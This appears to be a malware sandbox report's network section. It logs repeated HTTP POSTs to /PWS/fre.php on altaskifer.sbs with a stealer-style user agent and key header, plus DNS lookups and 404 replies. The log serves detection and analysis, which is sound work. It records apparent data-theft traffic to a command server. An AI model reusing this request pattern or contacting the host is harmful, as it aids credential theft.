Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 4_2_00404ED4 recv,

4_2_00404ED4

Source: unknown

DNS traffic detected: queries for: altaskifer.sbs

Source: unknown

HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 188Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ird%2BWHDZUtWVyC2%2FncP0yIxShO0qw3mvApHkRlJoExlp2h6OdyGyH8Y45xjU9%2FyHKXY%2BJ6UZsiXshhKDXzn8iibK47PsSNZerky5nlG9uw44paW1wpZoKbbruqes%2BSGxwA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700110e4a1667ec-MIAalt-svc: h3=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bheu0mag0aVlTdqa%2B2whCGLclexLUE8fh7vPYv5c9hpJv30kJvKijhZXHSCSTW3%2Bc9XQ3otgdN8STBr1J5y1cduUCbrylZtVdD5BZup4S2EhuAEKtzOO0LpnJwkxUby9Iw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001112aa860979-MIAalt-svc: h3=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tq5XK46q7SRjYFRcPZZfGKtcPIpBiLMJK4WjuAiH%2BL6Qev21ON07KL1P%2FnuNAOOFphYcTf%2FcinjsfdXVkPhgaPs2l03ihy5KeVBd2oVOyBooPop7xmnEGjFHscBB2WOilA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011172fae7418-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
